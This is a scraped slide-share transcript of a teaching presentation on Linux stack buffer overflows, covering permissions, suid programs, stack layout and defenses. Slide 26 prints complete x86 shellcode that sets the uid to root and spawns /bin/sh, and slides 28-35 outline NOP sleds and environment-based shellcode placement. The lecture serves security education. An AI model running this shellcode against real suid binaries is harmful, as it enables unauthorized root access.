Presentation is loading. Please wait.

Presentation is loading. Please wait.

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Published byKelley Barber Modified over 8 years ago

Similar presentations

Presentation on theme: "Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer."— Presentation transcript:

1 Buffer Overflows : An In-depth Analysis

2 Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer overflow exploit in fingerd in 1988 Programming languages commonly associated with buffer overflows include C and C++ A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated buffer Most commonly this occurs when copying strings of characters from one buffer to another Result in erratic program behavior, including memory access errors, incorrect results, program termination, or a breach of system security. In 2003, buffer overflows present in licensed Xbox games have been exploited to allow unlicensed software

3 Buffer Overflows A A L L I I C C E E 0 0 7 7 Name[9]Age[2] \0 Who the programmer was expecting… Name: Alice Age : 7

4 Buffer Overflows F F R R A A N N K K S S E E I I Name[9]Age[2] T T E E N N And who showed up uninvited… Name: Frankenstein Age : ? N

5 Introduction Exploitation The techniques to exploit a buffer overflow vulnerability vary per architecture, operating system and memory region Stack Based Buffer Overflows Heap Based Buffer Overflows Result in erratic program behavior, including memory access errors, incorrect results, program termination, or a breach of system security. duh! Now this is what I’m talking about !

6 Analysis of Stack Based Buffer Overflows on Linux Introduction Users, Groups and the Super User File Access Control and Permissions Suid Programs Memory Program Memory Segmentation Shellcode Program I Program II Defense

7 Fundamentals Users, Groups and the Super User User Hercules AthenaZeus Groups Group Gods Hercules OdysseusPerseus Group Mortals

8 Fundamentals Users, Groups and the Super User In Unix-style computer operating systems, root is the conventional name of the user who has all rights or permissions (to all files and programs) in all modes (single- or multi-user) The root user can do many things an ordinary user cannot, such as changing the ownership of files and binding to network ports numbered below 1024. The Root User

9 Fundamentals File Access Control and Permissions UserGroupOthers

10 Fundamentals File Access Control and Permissions Read Write Execute Read Write Read Write Dir Set G/Uid User Group Others Execute Set G/Uid Execute

11 Fundamentals File Access Control and Permissions

12 Fundamentals Suid Programs setuid and setgid are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group. When a permission with suid permission is executed, the user’s effective user id (euid) is changed to the program’s owner Unix programs like mount, passwd etc. are all suid root

13 Fundamentals Suid Programs

14 Fundamentals Memory X86 processors use a 32-bit addressing scheme Variables are places in the memory that store information Pointers are special type of variables that store memory address locations to reference information Processor Memory ESP EBP EIP

15 Fundamentals Memory Little Endian and Big Endian 0x78563412 Little Endian Big Endian 0x12345678 x86, 6502, Z80, VAXMotorola 6800, 68000, System/370

16 BSS contains uninitialized global variables, strings and constants Both BSS and Data Segment are of fixed size BSS contains uninitialized global variables, strings and constants Both BSS and Data Segment are of fixed size Fundamentals Program Memory Segmentation Segment where assembled machine language instructions are located Also known as Code Segment No write permission to this segment Can be shared between different copies of Same Program Segment where assembled machine language instructions are located Also known as Code Segment No write permission to this segment Can be shared between different copies of Same Program Store global and static variables Data Segment contains initialized global variables, strings and constants Store global and static variables Data Segment contains initialized global variables, strings and constants Used for program variables Variable size and grows from Lower to Higher memory locations Used for program variables Variable size and grows from Lower to Higher memory locations FILO data structure used to store context during function calls Variable size and grows from Higher to Lower memory locations FILO data structure used to store context during function calls Variable size and grows from Higher to Lower memory locations

17 Fundamentals The Stack Processor EBP ESP Stack Frame

18 Fundamentals Stack Frame When a function is called, information is pushed to the stack and is known as a stack frame Return Address Function Parameter n Function Parameter n-1 EBP ESP frame pointer / local base pointer Saved Frame Pointer Function Variable 1 Function Variable 2 Function Variable 3 stack pointer Memory Stack Growth

19 Fundamentals Stack By Example 1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[10]; } void main() { testfunction(1,2,3) } Sample Program

20 Fundamentals Stack By Example - Demo

21 Fundamentals Stack By Example - Demo

22 Fundamentals Stack By Example

23 Fundamentals Stack By Example

24 Fundamentals Stack By Example

25 Fundamentals Stack By Example EBP return address

26 Fundamentals Shellcode section.data ; section declaration filepath db "/bin/shXAAAABBBB" ; the string section.text ; section declaration global _start ; Default entry point for ELF linking _start: ; setreuid(uid_t ruid, uid_t euid) mov eax, 70 ; put 70 into eax, since setreuid is syscall #70 mov ebx, 0 ; put 0 into ebx, to set real uid to root mov ecx, 0 ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen ; execve(const char *filename, char *const argv [], char *const envp[]) mov eax, 0 ; put 0 into eax mov ebx, filepath ; put the address of the string into ebx mov [ebx+7], al ; put the 0 from eax where the X is in the string ; ( 7 bytes offset from the beginning) mov [ebx+8], ebx ; put the address of the string from ebx where the ; AAAA is in the string ( 8 bytes offset) mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the ; BBBB is in the string ( 12 bytes offset) mov eax, 11 ; Now put 11 into eax, since execve is syscall #11 lea ecx, [ebx+8] ; Load the address of where the AAAA was in the ; string into ecx lea edx, [ebx+12] ; Load the address of where the BBBB is in the ; string into edx int 0x80 ; Call the kernel to make the system call happen section.data ; section declaration filepath db "/bin/shXAAAABBBB" ; the string section.text ; section declaration global _start ; Default entry point for ELF linking _start: ; setreuid(uid_t ruid, uid_t euid) mov eax, 70 ; put 70 into eax, since setreuid is syscall #70 mov ebx, 0 ; put 0 into ebx, to set real uid to root mov ecx, 0 ; put 0 into ecx, to set effective uid to root int 0x80 ; Call the kernel to make the system call happen ; execve(const char *filename, char *const argv [], char *const envp[]) mov eax, 0 ; put 0 into eax mov ebx, filepath ; put the address of the string into ebx mov [ebx+7], al ; put the 0 from eax where the X is in the string ; ( 7 bytes offset from the beginning) mov [ebx+8], ebx ; put the address of the string from ebx where the ; AAAA is in the string ( 8 bytes offset) mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the ; BBBB is in the string ( 12 bytes offset) mov eax, 11 ; Now put 11 into eax, since execve is syscall #11 lea ecx, [ebx+8] ; Load the address of where the AAAA was in the ; string into ecx lea edx, [ebx+12] ; Load the address of where the BBBB is in the ; string into edx int 0x80 ; Call the kernel to make the system call happen

27 Smashing the Stack for fun and profit

28 1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[100]; scanf(buffer); } void main() { testfunction(1,2,3) } evil buffer

29 Smashing the Stack for fun and profit 1 2 3 return address stack frame pointer flag buffer return here 1 1 2 2 Run evil code here

30 Smashing the Stack for fun and profit Attacker Code Return Address to Attacker Code Structure of the ‘perfect’ Evil Input return address stack frame pointer flag buffer

31 Smashing the Stack for fun and profit Attacker Code Repeated Return Addresses to Attacker Code Structure of the ‘real-world’ Evil Input NOP Sled return address stack frame pointer flag buffer

32 Smashing the Stack for fun and profit

33 1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[5]; scanf(buffer); } void main() { testfunction(1,2,3) } Shellcode evil buffer What if the buffer was small ?

34 Smashing the Stack for fun and profit 1 2 3 return address stack frame pointer flag buffer void test_function(int a,int b, int c) { char flag; char buffer[5]; scanf(buffer); } void main() { testfunction(1,2,3) } Repeated return address to the shellcode in the environment evil buffer Thou shall use the environment…. environment Shellcode

35 Smashing the Stack for fun and profit Dumping the shellcode in the environment…. int execle(const char *path, const char *arg,..., char * const envp[]); Finding the return address…. return address = 0xbffffffa – length of shellcode – length of program name OR gdb

36 Smashing the Stack for fun and profit

37 Defense Choice of programming language Use of safe libraries Buffer overflow protection Address space layout randomization The Java and.NET bytecode environments also require bounds checking on all arrays Nearly every interpreted language will protect against buffer overflows Performance Versus Safety Avoid standard library functions which are not bounds checked (strcpy,strcat,gets) Buffer overflow protection is used to detect the most common buffer overflows by checking that the stack has not been altered Three such systems are Libsafe, StackGuard and ProPolice gcc patches Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH Exception Handler from being overwritten Address space layout randomization (ASLR) is a computer security feature which involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space.

38 References “The Art of Exploitation” - Jon Erickson Wikipedia Amal Krishnan Digital Security Practice Cognizant amalkrishnan@acm.org amal.chemmani@cognizant.com 9895937765 FIN

Download ppt "Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer."

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.

Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.

Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.

Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.

Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Lecture 16 Buffer Overflow

Lecture 16 Buffer Overflow
CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Dr. José M. Reyes Álamo 1.  The 80x86 memory addressing modes provide flexible access to memory, allowing you to easily access ◦ Variables ◦ Arrays ◦

Dr. José M. Reyes Álamo 1.  The 80x86 memory addressing modes provide flexible access to memory, allowing you to easily access ◦ Variables ◦ Arrays ◦
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

Similar presentations

Ads by Google